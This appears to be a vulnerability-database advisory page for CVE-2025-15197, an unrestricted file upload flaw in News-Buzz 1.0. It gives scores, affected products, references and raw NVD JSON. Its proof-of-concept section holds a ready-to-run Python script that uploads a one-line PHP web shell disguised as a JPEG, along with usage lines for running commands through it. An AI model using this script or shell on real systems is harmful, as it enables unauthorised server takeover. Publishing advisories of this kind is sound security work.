CVE-2025-15197

Description

A security flaw has been discovered in code-projects/anirbandutta9 Content Management System and News-Buzz 1.0. This vulnerability affects unknown code of the file /admin/editposts.php. Performing manipulation of the argument image results in unrestricted upload. The attack may be initiated remotely. The exploit has been released to the public and may be exploited.

CVSS Details

CVSS Score

4.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:anirbandutta:news-buzz:1.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:code-projects:content_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

News-Buzz 1.0

code-projects/anirbandutta9 Content Management System <= 当前版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-15197 PoC - Unrestricted File Upload in News-Buzz 1.0
# Target: /admin/editposts.php

def upload_shell(target_url, session_cookie):
    """
    Upload malicious PHP shell to target server
    """
    # Prepare the malicious PHP shell
    php_shell = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>"
    
    # Prepare multipart form data
    files = {
        'image': ('shell.php', php_shell, 'image/jpeg')
    }
    
    # Session cookies for authenticated admin access
    cookies = {
        'PHPSESSID': session_cookie
    }
    
    try:
        # Send the upload request
        response = requests.post(target_url, files=files, cookies=cookies, timeout=10)
        
        if response.status_code == 200:
            print('[+] File upload request sent successfully')
            print('[+] Check if shell is accessible at /uploads/shell.php')
            print('[+] Usage: GET /uploads/shell.php?cmd=whoami')
        else:
            print('[-] Upload failed with status:', response.status_code)
            
    except requests.exceptions.RequestException as e:
        print('[-] Error:', str(e))

if __name__ == '__main__':
    if len(sys.argv) < 3:
        print('Usage: python cve-2025-15197.py <target_url> <session_cookie>')
        print('Example: python cve-2025-15197.py http://target.com/admin/editposts.php abc123')
        sys.exit(1)
    
    target = sys.argv[1]
    cookie = sys.argv[2]
    upload_shell(target, cookie)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15197
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15197
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15197/
[4] VulDB https://vuldb.com/cve/CVE-2025-15197
[5] https://github.com/Limingqian123/CVE/issues/7
[6] https://vuldb.com/?ctiid.338584
[7] https://vuldb.com/?id.338584
[8] https://vuldb.com/?submit.724721
[9] https://github.com/Limingqian123/CVE/issues/7

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15197", "sourceIdentifier": "[email protected]", "published": "2025-12-29T17:15:44.713", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in code-projects/anirbandutta9 Content Management System and News-Buzz 1.0. This vulnerability affects unknown code of the file /admin/editposts.php. Performing manipulation of the argument image results in unrestricted upload. The attack may be initiated remotely. The exploit has been released to the public and may be exploited."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "baseScore": 5.8, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.4, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:anirbandutta:news-buzz:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "0EA32F07-9551-45D3-8C0B-37A0B2B0B446"}, {"vulnerable": true, "criteria": "cpe:2.3:a:code-projects:content_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "02CCDB18-7E64-4F10-9D59-7781D4806075"}]}]}], "references": [{"url": "https://github.com/Limingqian123/CVE/issues/7", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.338584", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.338584", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.724721", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/Limingqian123/CVE/issues/7", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}